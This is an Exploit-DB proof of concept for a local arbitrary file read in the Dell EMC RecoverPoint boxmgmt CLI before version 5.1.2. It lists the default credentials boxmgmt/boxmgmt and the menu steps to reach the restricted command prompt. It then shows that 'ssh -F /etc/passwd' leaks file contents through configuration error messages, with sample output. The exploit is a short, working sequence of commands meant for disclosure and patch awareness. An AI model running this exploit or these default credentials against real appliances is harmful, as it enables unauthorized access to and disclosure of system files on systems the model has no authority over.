Dell EMC RecoverPoint boxmgmt CLI < 5.1.2 - Arbitrary File Read

EDB-ID: 44688
Author: Paul Taylor
Published: 2018-05-22
Type: Local
Platform: Linux
Vulnerable App: N/A

 # Version: All versions before RP 5.1.2, and all versions before RP4VMs 
# Date: 2018-05-21
# Vendor Advisory: DSA-2018-095
# Vendor KB:
# Exploit Author: Paul Taylor
# Github:
# Website:
# Tested on: RP4VMs, RP 5.1.SP1.P2
# CVE: N/A

# 1. Description
# When logging in as boxmgmt and running an internal command, the ssh command may be used
# to display the contents of files from the file system which are accessible to the boxmgmt user.

# 2. Proof of Concept
# Log in as boxmgmt via SSH (default credentials boxmgmt/boxmgmt)
# Select [3] Diagnostics
# Select [5] Run Internal Command
# ssh -F /etc/passwd

test-cluster: 5
This is the list of commands you are allowed to use: ALAT NetDiag arp arping date ethtool netstat ping ping6 ssh telnet top uptime
Enter internal command: ssh -F /etc/passwd
/etc/passwd: line 1: Bad configuration option: root:x:0:0:root:/root:/bin/tcsh
/etc/passwd: line 2: Bad configuration option: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
/etc/passwd: line 3: Bad configuration option: bin:x:2:2:bin:/bin:/usr/sbin/nologin
/etc/passwd: terminating, 34 bad configuration options
Command "ssh -F /etc/passwd" exited with return code 65280

Related Posts